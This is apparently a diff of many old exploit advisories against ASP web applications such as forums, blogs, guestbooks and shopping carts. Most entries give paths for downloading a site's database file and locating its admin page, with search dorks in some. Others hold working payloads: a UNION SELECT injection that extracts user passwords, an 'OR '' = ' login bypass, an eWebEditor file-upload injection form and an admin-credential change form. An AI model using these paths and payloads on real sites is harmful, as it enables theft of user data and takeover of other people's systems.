| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : [ AspBB ] - Active Server Page Bulletin Board |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : Futility Forum 1.0 Revamp |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : htmlArea v2.03 |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : Uguestbook !talian script |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : BaalASP 2.0 |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : FULLY FUNCTIONAL ASP FORUM - MtMWebForum 1.0 |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : makit news/blog poster v3.1 |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : Battle Blog |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -16,27 +16,27 @@
|
|||
|
||||
==============================================================================
|
||||
|
||||
[»] ~ Note : Mutlu Yillar Millettt
|
||||
[»] ~ Note : Mutlu Yillar Millettt
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»]UranyumSoft Ýlan Servisi Database Disclosure Vulnerability
|
||||
[»]UranyumSoft Ýlan Servisi Database Disclosure Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
|
||||
|
||||
[»] Script: [ UranyumSoft Ýlan Servisi ]
|
||||
[»] Script: [ UranyumSoft Ýlan Servisi ]
|
||||
|
||||
[»] Language: [ ASP ]
|
||||
[»] Language: [ ASP ]
|
||||
|
||||
[»] Download: [ http://aspindir.com/Goster/5420]
|
||||
[»] Download: [ http://aspindir.com/Goster/5420]
|
||||
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
|
||||
[»] My Home: [ RevengeHack.com ]
|
||||
[»] My Home: [ RevengeHack.com ]
|
||||
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
|
||||
|
||||
###########################################################################
|
||||
|
@ -47,14 +47,14 @@
|
|||
|
||||
|
||||
|
||||
[»] http://server/[dizin]/database/db.mdb
|
||||
[»] http://server/[dizin]/database/db.mdb
|
||||
|
||||
|
||||
|
||||
|
||||
[»] Copyright 2008 UranyumSoft.com | Tüm haklarý saklýdýr.
|
||||
[»] Copyright 2008 UranyumSoft.com | Tüm haklarý saklýdýr.
|
||||
|
||||
[»] Admin Page: /yetki.asp
|
||||
[»] Admin Page: /yetki.asp
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -16,27 +16,27 @@
|
|||
|
||||
==============================================================================
|
||||
|
||||
[»] ~ Note : Mutlu Yillar Millettt
|
||||
[»] ~ Note : Mutlu Yillar Millettt
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»] BlogWorx Blog Database Disclosure Vulnerability
|
||||
[»] BlogWorx Blog Database Disclosure Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
|
||||
|
||||
[»] Script: [ BlogWorx Blog ]
|
||||
[»] Script: [ BlogWorx Blog ]
|
||||
|
||||
[»] Language: [ ASP ]
|
||||
[»] Language: [ ASP ]
|
||||
|
||||
[»] Download: [ http://devworx.somee.com/]
|
||||
[»] Download: [ http://devworx.somee.com/]
|
||||
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
|
||||
[»] My Home: [ RevengeHack.com ]
|
||||
[»] My Home: [ RevengeHack.com ]
|
||||
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
|
||||
|
||||
###########################################################################
|
||||
|
@ -47,11 +47,11 @@
|
|||
|
||||
|
||||
|
||||
[»] http://server/db/users.mdb Or db/teadmin.mdb
|
||||
[»] http://server/db/users.mdb Or db/teadmin.mdb
|
||||
|
||||
|
||||
|
||||
[»] © 2008 devworx - devworx.somee.com
|
||||
[»] © 2008 devworx - devworx.somee.com
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -16,27 +16,27 @@
|
|||
|
||||
==============================================================================
|
||||
|
||||
[»] ~ Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi
|
||||
[»] ~ Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»]Mini-NUKE v2.3 Freehost Multi Vulnerability
|
||||
[»]Mini-NUKE v2.3 Freehost Multi Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
|
||||
|
||||
[»] Script: [ Mini-NUKE v2.3 Freehost ]
|
||||
[»] Script: [ Mini-NUKE v2.3 Freehost ]
|
||||
|
||||
[»] Language: [ ASP ]
|
||||
[»] Language: [ ASP ]
|
||||
|
||||
[»] Download: [ http://aspindir.com/Goster/3543]
|
||||
[»] Download: [ http://aspindir.com/Goster/3543]
|
||||
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
|
||||
[»] My Home: [ RevengeHack.com and Ar-ge.Org ]
|
||||
[»] My Home: [ RevengeHack.com and Ar-ge.Org ]
|
||||
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
|
||||
|
||||
###########################################################################
|
||||
|
@ -47,15 +47,15 @@
|
|||
|
||||
|
||||
|
||||
[»] http://server/db/mn7O4Z6J7L5W.mdb
|
||||
[»] http://server/db/mn7O4Z6J7L5W.mdb
|
||||
|
||||
[»] http://server/setup.asp
|
||||
[»] http://server/setup.asp
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
[»] bu site motoru copyright © 2004 mini-nuke v2.3 kullanýlarak hazýrlanmýþtýr
|
||||
[»] bu site motoru copyright © 2004 mini-nuke v2.3 kullanýlarak hazýrlanmýþtýr
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -16,27 +16,27 @@
|
|||
|
||||
==============================================================================
|
||||
|
||||
[»] ~ Note : Baska Biri Bulduysa Affettsin :D
|
||||
[»] ~ Note : Baska Biri Bulduysa Affettsin :D
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»]Football Pool v3.1 Database Disclosure Vulnerability
|
||||
[»]Football Pool v3.1 Database Disclosure Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
|
||||
|
||||
[»] Script: [ Football Pool v3.1 ]
|
||||
[»] Script: [ Football Pool v3.1 ]
|
||||
|
||||
[»] Language: [ ASP ]
|
||||
[»] Language: [ ASP ]
|
||||
|
||||
[»] Download: [ http://aspindir.com/Goster/742]
|
||||
[»] Download: [ http://aspindir.com/Goster/742]
|
||||
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
|
||||
[»] My Home: [ RevengeHack.com ]
|
||||
[»] My Home: [ RevengeHack.com ]
|
||||
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
|
||||
|
||||
###########################################################################
|
||||
|
@ -47,14 +47,14 @@
|
|||
|
||||
|
||||
|
||||
[»] http://revengehack.com/[dizin]/data/NFL.mdb
|
||||
[»] http://revengehack.com/[dizin]/data/NFL.mdb
|
||||
|
||||
|
||||
|
||||
|
||||
[»] asp football pool v3.1 © 1999-2009 by mike hall. or 2009 Football Pool
|
||||
[»] asp football pool v3.1 © 1999-2009 by mike hall. or 2009 Football Pool
|
||||
|
||||
[»] Admin Page: /userLogin.asp
|
||||
[»] Admin Page: /userLogin.asp
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -22,9 +22,9 @@
|
|||
|
||||
===[ Exploit SQL ]===
|
||||
|
||||
[ª]SQL : [Path]/details&newsID=[inj3ct C0dE]
|
||||
[ª]SQL : [Path]/details&newsID=[inj3ct C0dE]
|
||||
|
||||
[ª]dem0:
|
||||
[ª]dem0:
|
||||
|
||||
http://www.site.com/?page=details&newsID=1905+union+select+1,pword,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users
|
||||
|
||||
|
|
|
@ -16,27 +16,27 @@
|
|||
|
||||
==============================================================================
|
||||
|
||||
[»] ~ Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi
|
||||
[»] ~ Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»]Acidcat CMS v 3.5 Multi Vulnerability
|
||||
[»]Acidcat CMS v 3.5 Multi Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
|
||||
|
||||
[»] Script: [ Mini-NUKE v2.3 Freehost ]
|
||||
[»] Script: [ Mini-NUKE v2.3 Freehost ]
|
||||
|
||||
[»] Language: [ ASP ]
|
||||
[»] Language: [ ASP ]
|
||||
|
||||
[»] Download: [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free]
|
||||
[»] Download: [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free]
|
||||
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
|
||||
[»] My Home: [ RevengeHack.com and Ar-ge.Org ]
|
||||
[»] My Home: [ RevengeHack.com and Ar-ge.Org ]
|
||||
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
|
||||
|
||||
###########################################################################
|
||||
|
@ -47,15 +47,15 @@
|
|||
|
||||
|
||||
|
||||
[»] http://server/[dizin]/databases/acidcat_3.mdb
|
||||
[»] http://server/[dizin]/databases/acidcat_3.mdb
|
||||
|
||||
[»] http://server/[dizin]/install.asp
|
||||
[»] http://server/[dizin]/install.asp
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
[»] Powered by Acidcat CMS v 3.5.1.f
|
||||
[»] Powered by Acidcat CMS v 3.5.1.f
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -16,27 +16,27 @@
|
|||
|
||||
==============================================================================
|
||||
|
||||
[»] ~ Note : Mutlu Yillar Millettt
|
||||
[»] ~ Note : Mutlu Yillar Millettt
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»]KMSoft Guestbook v 1.0 Database Disclosure Vulnerability
|
||||
[»]KMSoft Guestbook v 1.0 Database Disclosure Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
|
||||
|
||||
[»] Script: [ KMSoft Guestbook v 1.0 ]
|
||||
[»] Script: [ KMSoft Guestbook v 1.0 ]
|
||||
|
||||
[»] Language: [ ASP ]
|
||||
[»] Language: [ ASP ]
|
||||
|
||||
[»] Download: [ http://kmsoft.org]
|
||||
[»] Download: [ http://kmsoft.org]
|
||||
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
|
||||
[»] My Home: [ RevengeHack.com & Ar-ge.Org]
|
||||
[»] My Home: [ RevengeHack.com & Ar-ge.Org]
|
||||
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
|
||||
|
||||
###########################################################################
|
||||
|
@ -47,14 +47,14 @@
|
|||
|
||||
|
||||
|
||||
[»] http://server/[dizin]/db/db.mdb
|
||||
[»] http://server/[dizin]/db/db.mdb
|
||||
|
||||
|
||||
|
||||
|
||||
[»] KMSoft Guestbook v 1.0 Powered by KMSoft or Powered by KMSoft
|
||||
[»] KMSoft Guestbook v 1.0 Powered by KMSoft or Powered by KMSoft
|
||||
|
||||
[»] Admin Page: /admin
|
||||
[»] Admin Page: /admin
|
||||
|
||||
|
||||
|
||||
|
@ -64,7 +64,7 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng
|
|||
Ar-ge.Org :Cyber_945,D3xer
|
||||
|
||||
|
||||
- Kritik Benim,Kritigi Ben Bellerim,Kýzdýrmayýn Benim Alayinizi Keserim
|
||||
- Kritik Benim,Kritigi Ben Bellerim,Kýzdýrmayýn Benim Alayinizi Keserim
|
||||
- Ben Ne Heykirlar Gordum site heyklicek exploiti yok.Ben Ne exploitler gordum kullancak heykir yok :D
|
||||
|
||||
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
| # DAte : 16/12/2009
|
||||
| # Web Site : www.iq-ty.com
|
||||
| # Script : Powered by YP Portal MS-Pro
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0
|
||||
| # Bug : DB
|
||||
====================== Exploit By indoushka =================================
|
||||
# Exploit :
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
| # Web Site : www.iq-ty.com
|
||||
| # Dork : Lebi soft Ziyaretci Defteri_v7.5
|
||||
| # Script : (VP-ASP Shopping Cart 7.0) Copyright (c) 1999-2010 Rocksalt International.
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0
|
||||
| # Bug : DB
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
| # Web Site : www.iq-ty.com
|
||||
| # Dork : netGitar.com - Shop v1.0
|
||||
| # Script : (VP-ASP Shopping Cart 7.0) Copyright (c) 1999-2010 Rocksalt International.
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0
|
||||
| # Bug : DB
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -7,7 +7,7 @@
|
|||
| # Dork : Copyright 1999-2010 Rocksalt International Pty Ltd. All rights reserved
|
||||
| # Dork1 : VP-ASP Shopping Cart 7.0
|
||||
| # Script : (VP-ASP Shopping Cart 7.0) Copyright (c) 1999-2010 Rocksalt International.
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0
|
||||
| # Bug : DB
|
||||
====================== Exploit By indoushka =================================
|
||||
# Exploit :
|
||||
|
|
|
@ -1,26 +1,26 @@
|
|||
==============================================================================
|
||||
|
||||
[»] ~ Note : Mutlu Yillar Millettt
|
||||
[»] ~ Note : Mutlu Yillar Millettt
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»] Erolife AjxGaleri VT Database Disclosure Vulnerability
|
||||
[»] Erolife AjxGaleri VT Database Disclosure Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
|
||||
|
||||
[»] Script: [ Erolife AjxGaleri VT ]
|
||||
[»] Script: [ Erolife AjxGaleri VT ]
|
||||
|
||||
[»] Language: [ ASP ]
|
||||
[»] Language: [ ASP ]
|
||||
|
||||
[»] Download: [ http://www.aspindir.com/goster/4322]
|
||||
[»] Download: [ http://www.aspindir.com/goster/4322]
|
||||
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com - LionTurk.Turkblog.com }
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com - LionTurk.Turkblog.com }
|
||||
|
||||
[»] My Home: [ RevengeHack.com & Ar-ge.Org ]
|
||||
[»] My Home: [ RevengeHack.com & Ar-ge.Org ]
|
||||
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
|
||||
|
||||
###########################################################################
|
||||
|
@ -31,4 +31,4 @@
|
|||
|
||||
|
||||
|
||||
[»] http://localhost/path/db/ajxgaleri.mdb
|
||||
[»] http://localhost/path/db/ajxgaleri.mdb
|
|
@ -7,26 +7,26 @@
|
|||
|
||||
|
||||
==============================================================================
|
||||
[»] ABB v1.1 Forum Remote Database Disclosure Vulnerability
|
||||
[»] ABB v1.1 Forum Remote Database Disclosure Vulnerability
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ ABB Forums ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Possede de tres nombreuses options d administration et de configuration ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ ABB Forums ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Possede de tres nombreuses options d administration et de configuration ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://server/[path]/fpdb/abb.mdb
|
||||
[»] http://server/[path]/fpdb/abb.mdb
|
||||
|
||||
|
||||
===[ Admin Login ]===
|
||||
|
||||
[»] http://server/[path]/admin.asp
|
||||
[»] http://server/[path]/admin.asp
|
||||
|
||||
|
||||
Author: ViRuSMaN <-
|
||||
|
|
|
@ -11,27 +11,27 @@
|
|||
========================================================================
|
||||
|
||||
======
|
||||
[»] ~ Note : [ Tribute to the martyrs of Gaza . ]
|
||||
[»] ~ Note : [ Tribute to the martyrs of Gaza . ]
|
||||
========================================================================
|
||||
|
||||
======
|
||||
[»] Egreetings v1.0 b Remote Database Disclosure Vulnerability
|
||||
[»] Egreetings v1.0 b Remote Database Disclosure Vulnerability
|
||||
========================================================================
|
||||
|
||||
======
|
||||
|
||||
[»] Script: [ Egreetings ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Systeme d envoie de cartes de voeux ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ Egreetings ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Systeme d envoie de cartes de voeux ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://server/[path]/kort.mdb
|
||||
[»] http://server/[path]/kort.mdb
|
||||
|
||||
Author: ViRuSMaN <-
|
||||
|
||||
|
|
|
@ -7,21 +7,21 @@
|
|||
|
||||
|
||||
==============================================================================
|
||||
[»] E-membres v1.0 Remote Database Disclosure Vulnerability
|
||||
[»] E-membres v1.0 Remote Database Disclosure Vulnerability
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ E-membres ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Elle contient la partie d administration des membres ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ E-membres ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Elle contient la partie d administration des membres ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://server/[path]/db/bdEMembres.mdb
|
||||
[»] http://server/[path]/db/bdEMembres.mdb
|
||||
|
||||
|
||||
Author: ViRuSMaN <-
|
||||
|
|
|
@ -11,7 +11,7 @@ Arbitrary File Upload
|
|||
<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">
|
||||
<p align="center">
|
||||
<input type=file name=uploadfile size=100><br> <br>
|
||||
<input type=submit value=Upload> </p>
|
||||
<input type=submit value=Upload> </p>
|
||||
</form>
|
||||
|
||||
|
||||
|
|
|
@ -1,16 +1,16 @@
|
|||
==============================================================================
|
||||
[»] fipsForum v2.6 Remote Database Disclosure Vulnerability
|
||||
[»] fipsForum v2.6 Remote Database Disclosure Vulnerability
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ fipsForum ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ fipsForum is a simple and easy to use Forum System with a MS Access database. ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ fipsForum ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ fipsForum is a simple and easy to use Forum System with a MS Access database. ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://server/[path]/_database/forumFips.mdb
|
||||
[»] http://server/[path]/_database/forumFips.mdb
|
|
@ -26,7 +26,7 @@
|
|||
#
|
||||
# http://site/admin/index.asp
|
||||
#
|
||||
# Användarnamn(Username) : 'OR '' = '
|
||||
# Lösenord(password) : 'OR '' = '
|
||||
# Användarnamn(Username) : 'OR '' = '
|
||||
# Lösenord(password) : 'OR '' = '
|
||||
#
|
||||
################################################################################################
|
|
@ -4,7 +4,7 @@
|
|||
| # email : indoushka@hotmail.com
|
||||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)
|
||||
| # Web Site : http://scripti.org/i/ucuzalsat.zip
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.1
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.1
|
||||
| # Bug : ASP DB Download
|
||||
====================== Exploit By indoushka =================================
|
||||
# Exploit :
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
| # email : indoushka@hotmail.com
|
||||
| # Home : www.iqs3cur1ty.com/vb
|
||||
| # Web Site : http://dl.p30vel.ir/scripts/smans(www.p30vel.ir){a.allahparast}.zip
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
|
||||
| # Bug : Backup Dump
|
||||
====================== Exploit By indoushka =================================
|
||||
# Exploit :
|
||||
|
|
|
@ -7,7 +7,7 @@
|
|||
--------------------------------------------------------------------------------------
|
||||
#####################Sid3^effects aKa HaRi##################################
|
||||
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]
|
||||
#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR
|
||||
#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR
|
||||
#ShouTZ:kedar,dec0d3r,41.w4r10r
|
||||
#Catch us at www.andhrahackers.com or www.teamicw.in
|
||||
############################################################################
|
||||
|
@ -75,8 +75,8 @@ DEMO : TO change the admin login details and other info..
|
|||
<input type=text name=Adminlevel value="Root">
|
||||
</td>
|
||||
</tr>
|
||||
<td width="168"> </td>
|
||||
<td width="220"> </td>
|
||||
<td width="168"> </td>
|
||||
<td width="220"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td colspan="2">
|
||||
|
|
|
@ -1,38 +1,38 @@
|
|||
==============================================================================
|
||||
|
||||
[»] ~ Note : LionTurk.Turkblog.com Resmi Web Sitem :D
|
||||
[»] ~ Note : LionTurk.Turkblog.com Resmi Web Sitem :D
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»]Mesut Manþet Haber V1.0 Auth Bypass Vulnerability
|
||||
[»]Mesut Manþet Haber V1.0 Auth Bypass Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ Mesut Manþet Haber V1.0 ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Download: [ http://www.aspindir.com/goster/5377]
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com - LionTurk.Turkblog.com }
|
||||
[»] My Home: [ RevengeHack.com & Ar-ge.Org ]
|
||||
[»] N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
[»] Script: [ Mesut Manþet Haber V1.0 ]
|
||||
[»] Language: [ ASP ]
|
||||
